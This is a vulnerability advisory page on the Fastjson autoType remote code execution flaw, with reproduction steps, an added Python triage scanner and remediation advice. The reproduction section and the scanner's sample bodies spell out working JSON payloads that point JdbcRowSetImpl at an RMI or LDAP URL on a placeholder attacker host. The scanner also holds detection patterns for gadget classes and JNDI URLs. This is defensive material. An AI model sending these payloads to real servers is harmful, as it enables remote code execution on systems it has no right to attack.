Actively Exploited in the Wild

This vulnerability is being actively exploited in the wild.

Fastjson Remote Code Execution Vulnerability

Vulnerability

A remote code execution vulnerability exists in Fastjson versions prior to 1.2.48. The issue arises from improper handling of the autoType feature: when a JSON document contains an '@type' key whose value is a Java class name, Fastjson instantiates that class and invokes its public setter (and some getter) methods with values taken from the same document. In versions before 1.2.48 a class that the autoType denylist would otherwise reject can be loaded by first naming it as the 'val' of a separate '@type':'java.lang.Class' entry, which caches the class so that a later '@type' reference to it is accepted; this is how the attacker-supplied payload is hidden elsewhere in the JSON document. The resulting setter calls give the attacker JNDI injection. This vulnerability has been actively exploited in the wild from 2023 to 2025.

Impact

Exploitation of this vulnerability allows remote code execution on any server that parses attacker-controlled JSON with Fastjson, with the privileges of the JVM process doing the parsing.

Reproduction

The vulnerability can be reproduced by sending a JSON payload that includes an '@type' key with a value of 'com.sun.rowset.JdbcRowSetImpl' to a server that parses the request with Fastjson. The 'dataSourceName' field of that object is set to 'rmi://<attacker_ip>:<port>/Exploit' (an 'ldap://' URL works the same way); the JNDI lookup is actually triggered when a second property such as 'autoCommit' is set, because that setter calls connect(), which resolves 'dataSourceName' through JNDI and fetches the attacker's 'Exploit' reference. Two practical caveats: the RMI or LDAP server must be reachable from the target, and recent JDK builds disable remote class loading from RMI and LDAP references by default (the 'trustURLCodebase' properties are false since 8u121 and 8u191 respectively), so a working chain on a patched JDK typically needs a gadget that is already on the classpath rather than a remotely loaded class.
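The following is an added triage example for the pattern described in the Vulnerability and Reproduction sections above; it is not Fastjson code and not part of the original page. It parses a request body as JSON and flags the markers a responder would look for: any '@type' key, the '@type':'java.lang.Class' plus 'val' preload that smuggles a class name past the denylist, the 'com.sun.rowset.JdbcRowSetImpl' gadget, and JNDI URLs in string values. The sample bodies are constructed, the address 203.0.113.10 is a documentation placeholder for the attacker host, and the gadget list and severity labels are choices made here, not a Fastjson denylist.

```python
"""Triage scanner for Fastjson autoType payloads (added example, not Fastjson code)."""
import json
from typing import Any, Iterator

# Gadget class named on this page; extend for your own environment (assumption).
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
# URL schemes that a JdbcRowSetImpl.connect() JNDI lookup will resolve.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://")

# Constructed sample bodies (not captured traffic). 203.0.113.10 is a
# documentation address standing in for the attacker host.
BENIGN_BODY = '{"name":"alice","profile":{"@type":"com.example.Profile","age":30}}'
EXPLOIT_BODY = (
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://203.0.113.10:1099/Exploit","autoCommit":true}}'
)
# Same gadget with the key written as a \u escape; json.loads decodes it to "@type",
# so keyword matching on the raw body would miss it while this scanner does not.
ESCAPED_BODY = (
    '{"x":{"\\u0040type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://203.0.113.10:1389/a","autoCommit":true}}'
)


def _walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json-path, node) for every object, array element and scalar."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def scan_body(body: str) -> list[tuple[str, str, str]]:
    """Return (severity, path, reason) findings for one request body.

    Bodies that are not valid JSON produce no findings. Fastjson's parser is
    more lenient than json.loads, so treat a parse failure as a gap, not as clean.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    findings: list[tuple[str, str, str]] = []
    for path, node in _walk(doc):
        if isinstance(node, dict) and isinstance(node.get("@type"), str):
            cls = node["@type"]
            if cls == "java.lang.Class" and isinstance(node.get("val"), str):
                # Pre-1.2.48 bypass: loads and caches the named class so a later
                # '@type' referencing it skips the denylist check.
                findings.append(("high", path, f"java.lang.Class preload of {node['val']}"))
            elif cls in GADGET_CLASSES:
                findings.append(("high", path, f"known JNDI gadget class {cls}"))
            else:
                findings.append(("low", path, f"@type requests class {cls}"))
        elif isinstance(node, str) and node.lower().startswith(JNDI_SCHEMES):
            findings.append(("high", path, f"JNDI URL in string value: {node}"))
    return findings


def verdict(body: str) -> str:
    """Collapse findings to 'block' (gadget/JNDI seen), 'review' (any @type) or 'pass'."""
    severities = {sev for sev, _, _ in scan_body(body)}
    if "high" in severities:
        return "block"
    if "low" in severities:
        return "review"
    return "pass"


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("exploit", EXPLOIT_BODY), ("escaped", ESCAPED_BODY)):
        print(f"{label}: {verdict(body)}")
        for sev, path, reason in scan_body(body):
            print(f"  [{sev}] {path}: {reason}")
```

The scanner works on the decoded document rather than the raw bytes so that escaped keys are seen as Fastjson would see them; it is a triage aid for logs and proxies, not a substitute for upgrading, because Fastjson accepts input that strict JSON parsers reject.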

Remediation

Users are advised to update Fastjson to version 1.2.48 or later. Because further autoType bypasses were found after 1.2.48, upgrade to the latest 1.2.x release rather than stopping at 1.2.48, keep autoTypeSupport disabled (its default), and on 1.2.68 or later enable safeMode, which turns off autoType entirely. Do not parse untrusted input with autoType enabled, and check that no server-side code whitelists broad package prefixes.

Added: Jan 9, 2026, 7:35 AM
Updated: Jan 9, 2026, 7:35 AM

Vulnerability Rating

Custom Algorithm

spread: 6.6
impact: 7.5
exploitability: 6.4
remediation: 7.7
relevance: 2.0
threat: 8.0
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these eight key vulnerability categories, which are then combined to calculate the overall risk score.